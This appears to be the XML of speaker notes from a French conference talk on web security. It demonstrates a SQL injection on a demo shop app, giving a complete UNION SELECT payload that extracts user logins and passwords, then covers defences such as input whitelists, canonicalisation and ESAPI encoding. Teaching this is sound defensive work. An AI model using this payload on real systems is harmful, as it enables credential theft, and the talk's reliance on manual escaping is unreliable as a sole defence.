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80" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="76" d="100"/>
          <a:sy n="76" d="100"/>
        </p:scale>
        <p:origin x="-238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1492375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fr.wikipedia.org/wiki/Mot_de_passe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Java_(langage)" TargetMode="External"/><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localhost:8080/authentification?urlCible=http://localhost:8081/phishing"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www.lemonde.fr/vou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blog.codecentric.de/en/2013/10/automated-security-testing-web-applications-using-owasp-zed-attack-proxy/"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mailto:s4tan@hell.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nSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bonjour et bienvenue à ce talk sur la sécurité Frontend. Nous allons vous parler plus généralement sur la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sécurité web sur les sites grands public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>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42857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il existe une URL qui permet de lister les produits associés à une certaine catégorie grace au paramètre d’url “U”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comme vous vous en doutez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>derrière cette action est executée une requete SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permettant de récupérer les produits filtrés sur les bijoux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintenant l’idées d’Oscar est de ce servir de cette action afin de récupérer non seulement les bijoux mais aussi les utilisateurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour cela il utilise le UNION en sql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>Cette requête telle quelle ne ramènera pas les utilisateurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> car les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>formats de données </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>des deux tables PRODUIT &amp; UTILISATEUR ne sont pas les mêmes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Et la requete attend en sortie un objet de type PRODUIT avec ses propres paramètres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng"/>
              <a:t> (id, titre, description, visuel, prix, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’idée est d’exploiter les données issues de la table des utilisateurs pour créer des objets de type produit. Allez on va le faire en live !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>http://securite-app-gruyere.herokuapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/produits?u=bijou' UNION SELECT UTI_ID, UTI_LOGIN, UTI_PWD, 1.0, '/resources/img/pirate.png', 'hack', UTI_ID, UTI_LOGIN FROM UTILISATEUR WHERE '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>' UNION SELECT UTI_ID, UTI_LOGIN, UTI_PWD, 1.0, '/resources/img/pirate.png', 'hack', UTI_ID, UTI_LOGIN FROM UTILISATEUR WHERE '1'='1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8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fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mais de manière générale sachez que ce type d’injection est facile à exploiter et peu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avoir des impacts sévères sur les données du site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>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A partir de cette démonstration, on peut voir qu’une injection SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voler des informations sensible (lister des tables), =&gt; ce qu’a fait ici Oscar : discret, reutiliser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suppression/destruction de données (drop table) =&gt; l’utilisateur qui va s’en apercevoir rapidement, globalement moins intéressant pour le hacker sauf pour faire sauter ses contraventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corruption de données (modification prix, insertion de produits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>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La question que vous vous posez c’est la façon de se prémunir de ce type de faille</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Batched SQL Statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une instruction SQL est une seule commande SQL ( par exemple, SELECT * FROM table1 ou SET NOCOUNT ON) . Un lot d'autre part , est un certain nombre d'instructions SQL envoyées au serveur pour l'exécution comme un tout . Les déclarations contenues dans le lot sont compilées dans un plan d'exécution unique . Les lots sont séparés par la commande GO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non compatible JPA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contrôle des données saisies par l’utilisateur. par divers moyens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vous pouvez  echappez vos données : Tous les caratères spéciaux du SQL (les ‘, on met un \ devant) comme ça c’est pas interprété.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On peut aussi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifier tous les caractères saisis par l’utilisateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>à l’aide d’expressions régulières.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~ une Whitelist (liste de données passantes) de données attendues en entrée,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>Sur l’exemple du formulaire login/mdp c’est difficilement applicable mais sur un site bancaire par exemple, cela peut être utilisé pour vérifier le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>numero de compte saisi : qui ne sera composé que de chiffres et avec une taille fixe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Sur l’exemple précedent, appliqué sur une URL, c’est une bon moyen de vérification. Car on sait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t> exactement quelle donnée peut être attendue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>Du coup, l’injection SQL précédente (comportant des /, des vigules, etc) ne sera pas interprété. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ici le but est de transformer les données saisies par l’utilisateur en leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forme la plus simple possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il faut bien évidemment canoniser les données saisies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AVANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de vérifier l’intégrité de ces données. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex lors de la saisie d’un numéro de téléphone : on va retirer les -, ., etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Garde pas les caratacères inutiles ?</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fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt; De cette façon, le système gère une seule forme de données !</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fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Librairie sur différents languages (HTML, JS, URL etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>ESAPI librairie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoder oe = new OracleEncoder();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
